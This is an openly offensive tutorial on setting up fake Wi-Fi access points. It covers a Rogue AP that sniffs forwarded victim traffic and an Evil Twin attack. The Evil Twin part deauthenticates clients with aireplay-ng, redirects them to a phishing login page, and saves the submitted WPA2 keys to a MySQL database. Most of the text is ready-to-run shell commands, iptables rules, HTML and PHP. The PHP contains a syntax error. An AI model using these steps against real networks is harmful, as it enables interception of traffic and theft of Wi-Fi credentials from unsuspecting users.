A created Fake AP can be used for many evil stuff like sniffing credentials (Rogue AP) or reqesting credentials (Evil Twin).
1. Rogue AP
You set up an open WiFi AP and have a parallel connection to the internet. When a victim connects to your AP you just forward and sniff its traffic.
0. Find out all necessary data for setting up the AP (channel) and connecting to the internet (ssid).
$ iwlist wlan0 scanning
1. Get a second network interface with e.g. WiFi stick, ethernet, virtual WiFi (used here).
$ service network-manager stop $ ifconfig wlan0 down $ iw phy phy0 interface add new0 type station $ iw phy phy0 interface add new1 type __ap $ ifconfig new0 down $ ifconfig new1 down $ macchanger --mac 00:11:22:33:44:55 new0 $ macchanger --mac 00:11:22:33:44:66 new1 $ ifconfig new0 up $ ifconfig new1 up
2. Connect one network interface with the internet (ethernet or wireless)
$ wpa_passphrase <SSID> > wpa_sup.conf # Enter: WPA2-Key $ wpa_supplicant -B -D nl80211 -i new0 -c wpa_sup.conf $ dhclient new0
3. Creating an AP on the other network interface (wireless)
$ echo "interface=new1 driver=nl80211 ssid=Free-WiFi channel=<CHANNEL>" > hostapd.conf $ ifconfig new1 10.0.0.1 up $ hostapd hostapd.conf
4. Setting up DHCP for the network interface that works as AP
$ echo "interface=new1 dhcp-range=10.0.0.10,10.0.0.250,infinite dhcp-option=3,10.0.0.1 dhcp-option=6,10.0.0.1 server=8.8.8.8" > dnsmasq.conf $ route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 $ dnsmasq -C dnsmasq.conf -d
5. Forward the network traffic (victim <--> internet)
$ iptables --table nat --append POSTROUTING --out-interface new0 -j MASQUERADE $ iptables --append FORWARD --in-interface new1 -j ACCEPT $ echo 1 > /proc/sys/net/ipv4/ip_forward
2. Evil Twin
You set up an open WiFi AP with the same ssid as another and broadcast a deauth packet. When a victim connects to your AP you link it to your fake backend to request credentials.
This time it’s not necessary to have an internet connection, cause you fake the backend with a local apache/mysql service. The AP has to look like the AP you want to mirror, which means the same mac, ssid and channel. Let the traffic from the victim get routed to your created php website. After a deauthentification attack you have just to wait til a victim connects to you fake AP and inserts the from your website requested WLAN login. Now you can just query the mysql database for the saved wpa2 key. By the way if you are too lazy to do this by your own you can just use a tool like Fluxion.
1. Setup website (/var/www/html/) and database
CREATE USER 'user'@'localhost' IDENTIFIED BY 'pass'; GRANT ALL PRIVILEGES ON *.* TO 'user'@'localhost'; FLUSH PRIVILEGES; CREATE DATABASE WiFiKeysDB; USE WiFiKeysDB; CREATE TABLE WiFiKeys (wifikey VARCHAR(128));
<html>
<head><title>WiFi-Login</title></head>
<body>
<form action="writekey.php" method="post">
WiFi-Key: <input type="text" name="wifikey">
<input type="submit" value="Submit">
</form>
</body>
</html>
<?php
$wifikey = $_POST['wifikey'];
try {
$pdo = new PDO('mysql:host=localhost;dbname=WiFiKeysDB', 'user', 'pass');
$stm = $pdo->prepare('INSERT INTO WiFiKeys (wifikey) VALUES (?)');
$stm->execute(array($wifikey);
echo "Success";
} catch (PDOException $e) {
echo "Failure: " . $e->getMessage();
}
?>
$ service mysql start $ mysql -p < createdb.sql $ service apache2 start
2. Setup mirrored AP, DHCP and Routing
See above, but with mirrored data from the victim AP.
3. Add Routing to your local website
$ iptables -t nat -A PREROUTING -p tcp --dport 80 \ -j DNAT --to-destination <LOCAL_IP>:80
4. Deauth clients from the victim AP
# all clients $ aireplay-ng -0 5 -a <MAC_Router> <INTERFACE_AP> # specific client $ aireplay-ng -0 5 -a <MAC_Router> -c <MAC_Client> <INTERFACE_AP>